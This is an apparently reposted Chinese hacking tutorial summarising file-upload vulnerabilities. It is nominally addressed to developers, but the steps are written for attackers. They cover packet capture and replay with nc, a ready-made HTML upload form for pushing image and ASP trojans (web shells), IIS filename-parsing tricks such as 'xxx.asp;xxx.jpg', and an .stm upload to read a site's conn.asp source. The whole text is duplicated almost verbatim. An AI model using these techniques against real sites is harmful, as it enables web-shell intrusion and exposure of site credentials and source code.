脚本入侵-上传漏洞总结篇(臭小子)
程序员文章站
2022-04-07 08:00:47
脚本入侵-上传漏洞总结篇(臭小子),从事于网站开发的程序员要看下,不要让自己的程序别黑客利用。... 11-04-24...
1:抓包上传
我们可以用wsockexpert(抓包工具) hkcpost抓包提交软件或等等抓包工具
说下hkcpost有时候电脑打不开wsockexpert(抓包工具) 我们就用这工具
很好用
说到抓包上传 比如一个上传地址http://site/upload.asp
或后台管理后台上传地址
我们就抓包cookies 参数 和文件上传成功地址
然后用明小子或等等抓包工具 上传。大家可以去百度搜索相关的教程和文章看看
2:抓包和nc上传
抓包cookies 参数 和文件的数据 然后保存成文本 比如hack92.txt
然后用编译c32asm 或等等编译工具 修改
然后用nc.exe 提交 命令nc -vv site 80<hack92.txt
大家可以去百度搜索下nc上传 或突破 等等教程文章看
3:本地上传漏洞
把下面的代码 保存为hack92.html
------------------------------
<html><head>
<meta http-equiv=content-type content="text/html; charset=gb2312">
<style type=text/css>body {
font-size: 9pt; background-color: #e1f4ee
}
.tx1 {
border-right: #000000 1px solid; border-top: #000000 1px solid; font-size: 9pt; border-left: #000000 1px solid; color: #0000ff; border-bottom: #000000 1px solid; height: 20px
}
</style>
<meta content="mshtml 6.00.2800.1400" name=generator></head>
<body leftmargin=0 topmargin=0>
<form name=form1 action="把上传地址复制这里到这里" method=post
enctype=multipart/form-data><input class=tx1 type=file size=30 name=filename> <input class=tx1 type=file size=30 name=filename1> <input style="border-right: rgb(88,88,88) 1px double; border-top: rgb(88,88,88) 1px double; font-weight: normal; font-size: 9pt; border-left: rgb(88,88,88) 1px double; line-height: normal; border-bottom: rgb(88,88,88) 1px double; font-style: normal; font-variant: normal" type=submit value=上传 name=submit>
<input id=photourlid type=hidden value=0 name=photourlid> </form></body></html>
------------------------------------------
添加上传地址
把<form name=form1 action="把上传地址复制这里到这里" method=post
把:把上传地址复制这里到这里 你的上传地址
然后打开hack92.html 出现两个页面 第一个上你的图片木马 然后在上你的asp木马
提示在上asp木马记得 加个空格
4:iis漏洞
把我们的asp木马 改成xxx.asp;xxx.jpg 或xxx.asp.jpg
或建立asp.asp asa.asa 目录 上图片asp木马
5:上传突破
当网站不允许上传asp .. cer ..cdx . htr 等文件时,上传一个stm文件,代码为 “”(想查看什么文件就写什么文件名,这里我假设想查看的文件名为”conn.asp”),,然后直接打开这个stm文件的地址,再查看源代码,“conn.asp”这个文件的代码就一览无遗了!
大家可以去百度搜索相关的文章和教程
我们可以用wsockexpert(抓包工具) hkcpost抓包提交软件或等等抓包工具
说下hkcpost有时候电脑打不开wsockexpert(抓包工具) 我们就用这工具
很好用
说到抓包上传 比如一个上传地址http://site/upload.asp
或后台管理后台上传地址
我们就抓包cookies 参数 和文件上传成功地址
然后用明小子或等等抓包工具 上传。大家可以去百度搜索相关的教程和文章看看
2:抓包和nc上传
抓包cookies 参数 和文件的数据 然后保存成文本 比如hack92.txt
然后用编译c32asm 或等等编译工具 修改
然后用nc.exe 提交 命令nc -vv site 80<hack92.txt
大家可以去百度搜索下nc上传 或突破 等等教程文章看
3:本地上传漏洞
把下面的代码 保存为hack92.html
------------------------------
<html><head>
<meta http-equiv=content-type content="text/html; charset=gb2312">
<style type=text/css>body {
font-size: 9pt; background-color: #e1f4ee
}
.tx1 {
border-right: #000000 1px solid; border-top: #000000 1px solid; font-size: 9pt; border-left: #000000 1px solid; color: #0000ff; border-bottom: #000000 1px solid; height: 20px
}
</style>
<meta content="mshtml 6.00.2800.1400" name=generator></head>
<body leftmargin=0 topmargin=0>
<form name=form1 action="把上传地址复制这里到这里" method=post
enctype=multipart/form-data><input class=tx1 type=file size=30 name=filename> <input class=tx1 type=file size=30 name=filename1> <input style="border-right: rgb(88,88,88) 1px double; border-top: rgb(88,88,88) 1px double; font-weight: normal; font-size: 9pt; border-left: rgb(88,88,88) 1px double; line-height: normal; border-bottom: rgb(88,88,88) 1px double; font-style: normal; font-variant: normal" type=submit value=上传 name=submit>
<input id=photourlid type=hidden value=0 name=photourlid> </form></body></html>
------------------------------------------
添加上传地址
把<form name=form1 action="把上传地址复制这里到这里" method=post
把:把上传地址复制这里到这里 你的上传地址
然后打开hack92.html 出现两个页面 第一个上你的图片木马 然后在上你的asp木马
提示在上asp木马记得 加个空格
4:iis漏洞
把我们的asp木马 改成xxx.asp;xxx.jpg 或xxx.asp.jpg
或建立asp.asp asa.asa 目录 上图片asp木马
5:上传突破
当网站不允许上传asp .. cer ..cdx . htr 等文件时,上传一个stm文件,代码为 “”(想查看什么文件就写什么文件名,这里我假设想查看的文件名为”conn.asp”),,然后直接打开这个stm文件的地址,再查看源代码,“conn.asp”这个文件的代码就一览无遗了!
大家可以去百度搜索相关的文章和教程